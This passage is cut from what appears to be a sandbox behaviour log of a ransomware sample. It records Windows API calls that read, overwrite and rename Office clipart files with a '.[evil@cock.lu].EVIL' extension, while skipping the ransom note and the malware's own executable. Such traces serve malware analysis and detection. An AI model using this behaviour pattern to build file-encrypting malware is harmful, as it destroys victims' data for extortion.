hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x17e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17e00, lpOverlapped=0x0) returned 1 [0156.860] CloseHandle (hObject=0x1a8) returned 1 [0156.860] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382963.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.860] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.860] __uncaught_exception () returned 0x84b1160800 [0156.860] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.861] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382963.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382963.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382963.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382963.jpg.[evil@cock.lu].evil")) returned 1 [0156.861] ??_V@YAXPEAX@Z () returned 0x1 [0156.864] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382963.JPG", dwFileAttributes=0x200) returned 0 [0156.864] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.864] wcsstr (_Str="J0382965.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.864] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382965.JPG") returned 69 [0156.864] wcscmp (_String1="J0382965.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.864] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382965.JPG") returned 0x0 [0156.864] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382965.JPG") returned 0x45 [0156.864] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382965.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382965.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.866] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1bb02, lpOverlapped=0x0) returned 1 [0156.874] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.874] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.874] _errno () returned 0x84b1160840 [0156.874] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.874] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1bb20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1bb20, lpOverlapped=0x0) returned 1 [0156.874] CloseHandle (hObject=0x1a8) returned 1 [0156.874] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382965.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.875] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.875] __uncaught_exception () returned 0x84b1160800 [0156.875] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.875] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382965.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382965.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382965.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382965.jpg.[evil@cock.lu].evil")) returned 1 [0156.876] ??_V@YAXPEAX@Z () returned 0x1 [0156.878] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382965.JPG", dwFileAttributes=0x200) returned 0 [0156.878] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.879] wcsstr (_Str="J0382966.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.879] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382966.JPG") returned 69 [0156.879] wcscmp (_String1="J0382966.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.879] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382966.JPG") returned 0x0 [0156.879] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382966.JPG") returned 0x45 [0156.879] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382966.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382966.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.881] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x18888, lpOverlapped=0x0) returned 1 [0156.910] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.910] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.910] _errno () returned 0x84b1160840 [0156.911] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.911] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x188a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x188a0, lpOverlapped=0x0) returned 1 [0156.911] CloseHandle (hObject=0x1a8) returned 1 [0156.911] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382966.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.911] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.911] __uncaught_exception () returned 0x84b1160800 [0156.911] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.912] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382966.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382966.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382966.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382966.jpg.[evil@cock.lu].evil")) returned 1 [0156.913] ??_V@YAXPEAX@Z () returned 0x1 [0156.916] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382966.JPG", dwFileAttributes=0x200) returned 0 [0156.916] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.916] wcsstr (_Str="J0382967.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.916] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382967.JPG") returned 69 [0156.916] wcscmp (_String1="J0382967.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.916] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382967.JPG") returned 0x0 [0156.916] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382967.JPG") returned 0x45 [0156.916] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382967.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382967.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.918] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16d08, lpOverlapped=0x0) returned 1 [0156.927] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.927] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.927] _errno () returned 0x84b1160840 [0156.927] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.927] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x16d20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16d20, lpOverlapped=0x0) returned 1 [0156.927] CloseHandle (hObject=0x1a8) returned 1 [0156.928] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382967.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.928] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.928] __uncaught_exception () returned 0x84b1160800 [0156.928] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.928] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382967.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382967.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382967.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382967.jpg.[evil@cock.lu].evil")) returned 1 [0156.929] ??_V@YAXPEAX@Z () returned 0x1 [0156.932] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382967.JPG", dwFileAttributes=0x200) returned 0 [0156.932] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.932] wcsstr (_Str="J0382968.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.932] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382968.JPG") returned 69 [0156.932] wcscmp (_String1="J0382968.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.932] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382968.JPG") returned 0x0 [0156.932] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382968.JPG") returned 0x45 [0156.932] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382968.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382968.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.935] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b75f, lpOverlapped=0x0) returned 1 [0156.950] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.950] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.950] _errno () returned 0x84b1160840 [0156.950] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.950] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1b760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b760, lpOverlapped=0x0) returned 1 [0156.950] CloseHandle (hObject=0x1a8) returned 1 [0156.950] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382968.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.951] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.951] __uncaught_exception () returned 0x84b1160800 [0156.951] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.951] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382968.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382968.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382968.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382968.jpg.[evil@cock.lu].evil")) returned 1 [0156.952] ??_V@YAXPEAX@Z () returned 0x1 [0156.955] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382968.JPG", dwFileAttributes=0x200) returned 0 [0156.955] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.955] wcsstr (_Str="J0382969.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.955] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382969.JPG") returned 69 [0156.955] wcscmp (_String1="J0382969.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.955] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382969.JPG") returned 0x0 [0156.955] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382969.JPG") returned 0x45 [0156.956] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382969.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382969.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.958] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1779f, lpOverlapped=0x0) returned 1 [0156.967] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.967] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.967] _errno () returned 0x84b1160840 [0156.967] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.967] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x177a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x177a0, lpOverlapped=0x0) returned 1 [0156.967] CloseHandle (hObject=0x1a8) returned 1 [0156.967] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382969.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.967] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.968] __uncaught_exception () returned 0x84b1160800 [0156.968] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.968] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382969.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382969.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382969.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382969.jpg.[evil@cock.lu].evil")) returned 1 [0156.969] ??_V@YAXPEAX@Z () returned 0x1 [0156.972] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382969.JPG", dwFileAttributes=0x200) returned 0 [0156.972] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.972] wcsstr (_Str="J0382970.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.972] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382970.JPG") returned 69 [0156.972] wcscmp (_String1="J0382970.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.972] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382970.JPG") returned 0x0 [0156.972] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382970.JPG") returned 0x45 [0156.973] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382970.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382970.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.975] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x15b94, lpOverlapped=0x0) returned 1 [0156.999] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.999] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.999] _errno () returned 0x84b1160840 [0156.999] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.999] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x15ba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x15ba0, lpOverlapped=0x0) returned 1 [0156.999] CloseHandle (hObject=0x1a8) returned 1 [0156.999] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382970.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.000] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.000] __uncaught_exception () returned 0x84b1160800 [0157.000] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.000] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382970.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382970.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382970.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382970.jpg.[evil@cock.lu].evil")) returned 1 [0157.001] ??_V@YAXPEAX@Z () returned 0x1 [0157.005] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382970.JPG", dwFileAttributes=0x200) returned 0 [0157.006] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.006] wcsstr (_Str="J0384862.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.006] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384862.JPG") returned 69 [0157.006] wcscmp (_String1="J0384862.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.006] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0384862.JPG") returned 0x0 [0157.006] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384862.JPG") returned 0x45 [0157.006] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384862.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384862.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.008] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x190e9, lpOverlapped=0x0) returned 1 [0157.027] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.027] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.027] _errno () returned 0x84b1160840 [0157.028] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.028] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x19100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x19100, lpOverlapped=0x0) returned 1 [0157.028] CloseHandle (hObject=0x1a8) returned 1 [0157.028] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384862.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.028] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.028] __uncaught_exception () returned 0x84b1160800 [0157.028] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.029] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384862.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384862.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384862.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384862.jpg.[evil@cock.lu].evil")) returned 1 [0157.030] ??_V@YAXPEAX@Z () returned 0x1 [0157.033] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384862.JPG", dwFileAttributes=0x200) returned 0 [0157.033] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.033] wcsstr (_Str="J0384885.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.033] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384885.JPG") returned 69 [0157.033] wcscmp (_String1="J0384885.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.033] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0384885.JPG") returned 0x0 [0157.033] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384885.JPG") returned 0x45 [0157.034] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384885.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384885.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.036] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x17b79, lpOverlapped=0x0) returned 1 [0157.056] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.056] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.056] _errno () returned 0x84b1160840 [0157.056] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.057] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x17b80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17b80, lpOverlapped=0x0) returned 1 [0157.057] CloseHandle (hObject=0x1a8) returned 1 [0157.057] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384885.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.057] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 